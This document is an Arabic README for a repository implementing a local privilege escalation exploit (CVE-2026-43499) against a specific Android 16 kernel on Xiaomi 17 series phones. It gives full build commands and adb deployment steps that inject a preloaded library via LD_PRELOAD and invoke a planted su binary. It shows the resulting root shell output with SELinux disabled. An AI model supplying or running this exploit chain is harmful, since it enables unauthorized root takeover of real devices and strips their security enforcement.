
تنفيذ CVE-2026-43499 لـ 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k
popsicleيحتوي هذا المستودع على تنفيذ لرفع الامتيازات محليًا (Local Privilege Escalation) على نظام Android 16 لهاتف Xiaomi 17 Pro Max (popsicle) عبر CVE-2026-43499. النواة المُتحقق منها:
6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k
تم التحقق من أن سلسلة Xiaomi 17 وPro وUltra التي تستخدم هذه النواة تعمل بالكامل.
يتطلب Python 3 و llvm-objdump:
python3 generate_target.py \
--boot boot.img \
--xbl-config xbl_config.img \
-o source/src/target.h
make -C source clean preload
عند تعذر الاكتشاف التلقائي لـ NDK:
NDK_ROOT=/path/to/android-ndk make -C source clean preload
الناتج النهائي:
source/build/bin/preload.so
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'
عند النجاح تظهر:
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0
بعد اكتمال الاستغلال يمكن إضاءة الشاشة وفتح القفل والدخول إلى سطح المكتب، لكن أي تطبيق Android يُطلق حديثًا لا يتمكن من إكمال تهيئة Framework مما يؤدي إلى انهياره (crash)؛ بعد إعادة التشغيل تعود التطبيقات إلى الإقلاع بشكل طبيعي.